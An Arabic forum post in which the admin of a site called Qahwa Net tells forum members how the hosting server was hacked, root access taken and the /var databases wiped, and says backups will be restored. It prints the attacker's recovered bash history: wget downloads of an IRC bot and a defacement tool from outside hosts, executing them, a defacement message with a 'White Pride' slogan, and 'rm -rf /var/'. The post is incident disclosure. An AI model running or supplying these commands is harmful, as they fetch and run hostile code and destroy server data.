الإخوة الأعزاء/ مشرفو وأعضاء منتدى سوالف سوفت
السلام عليكم ورحمة الله وبركاته
نعلم ان الدنيا متقلبة ولا تبقى على حال ، ولا بدمن حصول الألم لكل نفس سواء كانت مؤمنة او غير مؤمنة. كما نعلم اخواني الكرام ان الله سبحانه وتعالى لا يقدر شرا محضا ليس فيه خير ، بل كل ما قدر وإن ظهر لنا أنه شر كله فإن من وراءه من الخير مالا يعلمه إلا الله.
إخواني الكرام ، فكما والله احزنني ماحدث للموقع من اختراق وتدمير من قبل مجموعة الهاكر البرازيلية فقد والله افرحني كثيرا وأثلج صدري ماقرأته من ردودكم وتفاعلكم معي ، مع علمي بأني لا أستحق ماذكر عني ولم اقدم الا اليسير لإخواني بسبب كثرة الأعمال ، فجزاكم الله خيرا وبارك فيكم. وقد سررت كثيرا جدا بعدد الذين استفادوا مما يقدم في موقع قهوة نت ، فالحمد لله رب العالمين ، وعسى أن تكرهوا شيئا وهو خير لكم.
* ماذا حدث وكيف حدث الاختراق ؟
ماحدث لم يكن اختراق لموقع قهوة نت فقط ولكن كان اختراق كامل للسيرفر المستضيف لموقع قهوة نت. وهذا السيرفر هو سيرفر خاص ، وأنا احد المسؤولين عن هذا السيرفر. السيرفر تم تحديث جميع برامجة الى احدث النسخ قبل الاختراق مثل برنامج Apache و PHP و FrontPage و mod_ssl وغيرها.
المخترق وهو كما ذكره الإخوان هنا هو R0NiN وهو من البرازيل ،، بطريقة ما استطاع اختراق السيرفر ومن ثم اضاف مستخدم له صلاحيات root . اي بمعنى اخر تحكم كامل في السيرفر. ثم قام بحذف مجلد /var من السيرفر حذفا كاملا. وتعلمون ان هذا المجلد يحتوي على قواعد البيانات للسيرفر كاملة. أي ان جميع قواعد البيانات لجميع المواقع تم حذفها كاملا بأمر واحد لا يتعدى عدد من الأحرف. بعض قواعد البيانات في السيرفر كان حجمها 1 جيجا بايت !!!!! .
ثم بعد ذلك بحث عن ملفات بامتداد .mdb لعله يجد قواعد بيانات الأكسس كي يقوم بمسحها هي الأخرى ولكن لم يجد شيئا. وهذا يدل على انه كان يريد فعلا أن يمسح قواعد البيانات ولم يكن حذفه لقواعد البيانات في مجلد /var هو لإخفاء اثاره كما ذكرت الشركة المستضيفة للسيرفر. وهذه بعض الأوامر التي اخذت من bash_history والتي تم تنفيذها بواسطة المخترق :
انظروا الى سطر الأمر هذا:كود:w cd /tmp mkdir .r wget http://aneurismcrew.port5.com/bot cd .r wget http://aneurismcrew.port5.com/bot wget http://aneurismcrew.port5.com/neoscript wget http://aneurismcrew.port5.com/initdata mv initdata INITDATA ./bot -sirc.brasnet.org -p6666 -nNaziGirl -aneoscript >/dev/null & chmod +x bot ./bot -sirc.brasnet.org -p6666 -nNaziGirl -aneoscript >/dev/null & ls cd tmp wget ftp://dndepice:darkmantle@<a href="h...com/cancer</a> chmod +x cancer echo s4bb4th In your *nix system .. Greetz: R0NiN > fuck.txt ./cancer fuck.txt | * White Pride * | +-------------------------------+ - /*index.* are now -> "fuck.txt". rm -rf /var/ w ls cd root ls ls -la car .bash_profile cat .bash_profile cat .bashrc cat .bash_logout w uname -a ls cd / ls cd tmp ls cat fuck.txt ps ax ls BitchX find / -name *.mdb cd bot cat bot w ls ls -la cd .r ls ./bot cat INITDATA cat neoscript ls cd .. ls ls -la cd .l ls cd psybnc/ ls cat psybnc.conf ls
rm -rf /var/
بكل بساطة ،، وضع امر حذف للمجلد /var !!!!!!!!!!!!!!!!
أما عن كيفية الإختراق فهذا مالم نستطع التعرف عليه حتى الآن وهو المشكلة الكبرى حاليا ، ولا أعتقد حقيقة أنه ثغرة في النيوك استطاع من خلالها الوصول الى مستخدم root للسيرفر ولكن لا أستطيع الجزم بذلك ايضا. هناك رأي اخر وهو ان الاختراق تم عن طريق mysql وذلك بسبب أنه قبيل الاختراق مباشرة وردت رسائل الكترونية كثيرة الى المشرف على السيرفر تفيد ان خادم الداتابيس MySql Server يتوقف بشكل متكرر ، ولكن حقيقة لا نعلم كي تم الإختراق.
* عائدون ان شاء الله
تم المفاهمة مع الشركة المستضيفة للسيرفر وهي شركة فنيشرز اون لاين بعمل إعادة تركيب لبرامج السيرفر وذلك لتلافي اي برامج أخرى تم وضعها في السيرفر من قبل المخترق. ومن تيسير الله سبحانه وتعالى اننا قمنا بعمل نسخة احتياطية من فترة ليست بالبعيدة لبعض قواعد البيانات ومن ضمنها موقع قهوة نت ، وسوف نقوم باسترجاعها حالما يكون السيرفر جاهزا للعمل.
* وأخيرا
اود ان اتقدم بالشكر والعرفان للمسؤولين عن هذا الصرح الشامخ ، سوالف سوفت ، وأسأل الله العظيم ان يجزل لهم الأجر والمثوبة ، كما أود ان اشكر اعضاء منتدى سوالف سوفت على مبادرتهم الطيبة والتي تنم عن طيب معدنهم وتكاتفهم وتعاونهم في سبيل بذل الخير للجميع.
شكرا لكم جميعا ،،، وعـــــــــــــــــــــــــــــــــــائدون ان شاء الله.
اخوكم / خالد
قهوة نت
